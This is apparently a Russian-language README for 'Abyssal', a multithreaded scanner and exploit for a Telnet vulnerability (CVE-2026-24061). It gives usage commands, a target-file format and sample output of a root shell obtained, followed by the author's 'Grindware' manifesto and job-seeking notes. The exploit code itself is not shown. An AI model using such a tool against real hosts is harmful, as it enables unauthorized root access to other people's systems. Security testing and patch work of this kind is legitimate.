
# Abyssal Abyssal — это высокопроизводительный сканер уязвимостей Telnet для CVE-2026-24061, обеспечивающий получение root-оболочек на уязвимых системах с обнаружением ложных срабатываний.
Сканер уязвимостей Telnet и эксплойт для CVE-2026-24061
Из глубин мы восстаём.
Многопоточность, обнаружение ложных срабатываний, интерактивный root-шелл при успехе.
Этот проект создан опытным ИТ-специалистом с многолетней практической работой в области сетевой безопасности, инфраструктуры и разработки программного обеспечения. В 55 лет я активно ищу новые возможности — будь то постоянная работа, фриланс или участие в проектах. Если вы цените опыт, глубокие технические знания и практичный подход к решению проблем — давайте свяжемся.
📫 Я открыт для предложений о работе по всему миру.
✉️ Контакт: [[email protected]]
📖 Использование
Базовое сканирование (без интерактивного режима)
python3 abyssal.py -f targets.txt
Интерактивный режим (получение шелла при успехе)
python3 abyssal.py -f targets.txt --interactive
Дополнительные параметры
python3 abyssal.py -f targets.txt -t 20 --interactive -o scan.log
Параметры командной строки
| Параметр | Описание |
|---|---|
| -f, --file | Файл с IP-адресами (по умолчанию: ip_list.txt) |
| -t, --threads | Количество параллельных потоков (по умолчанию: 10) |
| -i, --interactive | Интерактивный режим — получить шелл на уязвимых системах |
| -o, --output | Имя файла журнала (генерируется автоматически, если не указано) |
| -c, --connect-timeout | Таймаут подключения в секундах (по умолчанию: 5) |
| -s, --session-timeout | Таймаут сеанса в секундах (по умолчанию: 10) |
| --version | Показать информацию о версии |
| -h, --help | Показать справочное сообщение |
📂 Формат файла целей
Создайте файл, в котором каждая цель указывается с новой строки:
# Single IPs
192.168.1.100
10.0.0.50
# IP with custom port
192.168.1.200:2323
# Subnet (CIDR) — support coming soon
# 192.168.1.0/24
# Comments are allowed
172.16.1.25 # Office server
📊 Пример вывода
╔═══════════════════════════════════════════════════════════════════════════════╗
║ ║
║ █████╗ ██████╗ ██╗ ██╗███████╗███████╗ █████╗ ██╗ ║
║ ██╔══██╗██╔══██╗╚██╗ ██╔╝██╔════╝██╔════╝██╔══██╗██║ ║
║ ███████║██████╔╝ ╚████╔╝ ███████╗███████╗███████║██║ ║
║ ██╔══██║██╔══██╗ ╚██╔╝ ╚════██║╚════██║██╔══██║██║ ║
║ ██║ ██║██████╔╝ ██║ ███████║███████║██║ ██║███████╗ ║
║ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝╚══════╝ ║
║ ║
║ Abyssal - CVE-2026-24061 Telnet Vulnerability Scanner ║
║ "From the depths, we rise." ║
║ ║
║ Built by: Klaus Baumdick ║
║ Contact: [email protected] ║
║ Status: Open for new opportunities worldwide ║
║ ║
╚═══════════════════════════════════════════════════════════════════════════════╝
⚠️ INTERACTIVE MODE ENABLED!
On REAL login prompt or shell, control will be passed to you.
False positives are automatically detected and ignored.
Press CTRL+C to abort.
Starting scan with 10 parallel threads
Total: 100 targets to test
============================================================
🎯 REAL ROOT SHELL (#) ON 192.168.1.100:23 OBTAINED!
============================================================
>>> You now have shell access!
>>> Execute any commands (whoami, id, ls, etc.)
>>> Type 'exit' or press CTRL+C to close
------------------------------------------------------------
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# exit
[*] Session on 192.168.1.100:23 closed.
============================================================
SCAN COMPLETED
============================================================
Duration: 45.23 seconds
Targets tested: 100
📊 SUMMARY:
✅ REAL VULNERABLE: 15
🔒 PROTECTED: 42
❓ FAILED: 23
🌐 UNREACHABLE: 20
⚠️ FALSE POSITIVES: 0
🚨 SECURITY WARNING:
15 system(s) are REALLY vulnerable to CVE-2026-24061!
→ Disable or patch Telnet immediately!
→ Use SSH as a secure alternative!
⚠️ Disclaimer
This tool is for authorized security testing and educational purposes only.
Only use on systems you own or have explicit written permission to test
Unauthorized access to computer systems is illegal
The author assumes no responsibility for misuse of this tool
Use responsibly and at your own risk
📝 Лицензия
Этот проект распространяется по лицензии MIT — подробности см. в файле LICENSE.
🤝 Связь
Klaus Baumdick 📫 Эл. почта: [email protected]
🔗 GitHub: github.com/stoerti2
📌 Статус: Открыт для новых возможностей по всему миру
📚 Ссылки
CVE-2026-24061
Уязвимость GNU InetUtils Telnetd
git clone https://github.com/stoerti2/abyssal.git
#┌────────────────────────────────────────────────────────────────────────┐
#│ │
#│ ███████╗████████╗ ██████╗ ███████╗██████╗ ████████╗██╗ │
#│ ██╔════╝╚══██╔══╝██╔═══██╗██╔════╝██╔══██╗╚══██╔══╝██║ │
#│ ███████╗ ██║ ██║ ██║█████╗ ██████╔╝ ██║ ██║ │
#│ ╚════██║ ██║ ██║ ██║██╔══╝ ██╔══██╗ ██║ ██║ │
#│ ███████║ ██║ ╚██████╔╝███████╗██║ ██║ ██║ ██║ │
#│ ╚══════╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝ │
#│ │
#│ "old school, still root" │
#│ "stoerti - the jobless hacker" │
#│ │
#│ ┌──────────────────────────────────────────────────────────────┐ │
#│ │ 40 years in the trenches. │ 6 months unemployed in DE. │ │
#│ │ They fired the one who knew. │ This is my legacy. │ │
#│ │ -- no patches for reality -- │ │
#│ └──────────────────────────────────────────────────────────────┘ │
#│ │
#└────────────────────────────────────────────────────────────────────────┘
Что такое Grindware?
Grindware — это программное обеспечение, которое существует потому, что никто не платит мне за создание того, что действительно имеет значение.
Я безработный уже шесть месяцев. Не потому, что не умею писать код, — а потому, что рынку больше не важны навыки. Ему важны модные словечки, сертификаты и знакомства. Поэтому вместо того, чтобы ждать работу, которая никогда не придёт, я создаю.
Grindware — результат этого.
Создано по необходимости — не ради прибыли, не для инвесторов, не ради дорожной карты продукта. Создано потому, что чему-то нужно было существовать, а никто другой не собирался это создавать.
Выпущено бесплатно — потому что прятать код за платным доступом неправильно, когда знаешь, каково остаться ни с чем.
Честно — никакой маркетинговой шелухи, никакой ерунды про «корпоративный уровень». Просто код, который работает.
Не отшлифовано, но функционально — своё дело делает. Нужен красивый интерфейс — идите куда-нибудь ещё.
Потому что так оно и есть. Код, написанный в процессе изнурительной борьбы. Поздними ночами. После 47-го отказа в работе. В моменты, когда осознаёшь, что системе на тебя наплевать, так что можно строить свою собственную.
Grindware — это код выживания.
Разработчики, уставшие от корпоративной чепухи
Исследователи безопасности, которым нужны инструменты, которые действительно работают
Все, кто считает, что ПО должно быть полезным, а не просто прибыльным
Люди, которые тоже находятся в этой борьбе
Не компания
Не стартап
Не продукт
Не продаётся
Grindware — это просто код. От одного безработного разработчика — всему миру.
Если вы используете Grindware — этого достаточно. Если хотите поддержать проект, вы можете:
⭐ Поставить репозиторию звезду
🐛 Сообщать об ошибках
🔧 Вносить свой код
💬 Поделиться им с теми, кому он может пригодиться
Я всегда открыт для работы. Если вам нужен разработчик, который действительно создаёт вещи, — давайте поговорим.
Grindware — создано в борьбе, выпущено бесплатно.
По вопросам, касающимся этого набора данных, обращайтесь: [email protected]
Последнее обновление: июль 2026